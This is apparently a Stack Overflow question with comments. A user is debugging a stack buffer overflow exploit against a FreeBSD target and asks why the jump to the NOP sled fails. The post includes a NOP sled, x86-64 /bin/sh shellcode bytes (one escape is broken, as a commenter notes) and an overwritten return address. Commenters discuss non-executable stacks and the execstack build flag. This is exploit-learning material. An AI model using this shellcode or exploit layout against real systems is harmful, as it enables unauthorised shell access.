0

So I am trying to implement a buffer overflow to get shell access to a buggy machine.

The machine is

  • freebsd
  • little endian byte reading
  • String length is 200 which causes the overflow.

Now after consulting http://shell-storm.org/shellcode/files/shellcode-106.php to get a shellcode for /bin/sh and modifying the string, this is what I made

NO-Ops: "\x90"x164

SHELLCODE: "\x48\x31\xc0\x99\xb0\x3b\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08x57\x48\x89\xe7\x57\x52\x48\x89\xe6\x0f\x05";print

Address to jump to :"\x68\xea\xff\xff\xff\x7f";' # 0x7fffffffea68 is in the middle of the No-Ops.

The problem is, I can get my EIP to point to 0x7fffffffea68 exactly. However when the segmentation fault occurs, the address shows up as 0x00007fffffffae68. How do I navigate to the address 0x7fffffffea68 as it shows up without the 4 zeros when I look at the registers from the stack pointer ? The address is correct but can not jump there as it is "incorrect".

This is how the address shows up during segmentation fault. (ignore ea/ae here, the problem is same both ways) How it appears on segmentation fault

Here is the output of info registers. The instruction pointer to address

Here is how it appears on the dump (to show the intended address). w.r.t stack pointers, giving the address to jump into

I do not understand where I am going wrong with this. The likely answer is the address to jump to so I tried making various changes to the lengths and where to jump to. It still does not work.

The second could be the shellcode but I put my money on the length. I need help to understand where I might be wrong and how I can go about mitigating this problem. Thanks.

Peter Cordes
  • 328,167
  • 45
  • 605
  • 847
aika
  • 1
  • 2
  • 2
    0x7fffffffae68 and 0x00007fffffffae68 are the very same numbers. It is quite common to suppress leading zeroes. – the busybee Jan 17 '22 at 10:10
  • 1
    The memory dump is at 0x7fffffffea68, not 0x7fffffffae68. – Ruud Helderman Jan 17 '22 at 10:21
  • Sorry, added the correction between ae and ea. ea is the correct one. the problem is same regardless. – aika Jan 17 '22 at 10:29
  • 1
    "Invalid permission" could mean that you are not allowed to execute code from the data segment. A common virus protection feature. – BoP Jan 17 '22 at 11:27
  • ohh. Makes sense. Let me try this with root. – aika Jan 17 '22 at 12:08
  • Did not work that way as well but let me try looking from the suggested problem. Thank you for the tip. – aika Jan 17 '22 at 12:16
  • There's a backslash missing in `"\x48\x31\xc0\x99\xb0\x3b\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08x57\x48\x89\xe7\x57\x52\x48\x89\xe6\x0f\x05";print`. This is not going to fly. – Ruud Helderman Jan 17 '22 at 14:00
  • 1
    Processes running as `root` don't have all their pages read+write+exec, that would be the absolute last thing you'd want, making them more vulnerable to code-injection attacks like this!! You probably need to build with `gcc -z execstack` to make the stack itself executable (previously that made all pages executable, but not anymore). See [How to get c code to execute hex machine code?](https://stackoverflow.com/q/9960721) for example, and [Exactly what cases does the gcc execstack flag allow and how does it enforce it?](https://stackoverflow.com/q/53346274) – Peter Cordes Jan 17 '22 at 15:47
  • Thank you @PeterCordes. Will try this path. – aika Jan 18 '22 at 09:51

0 Answers0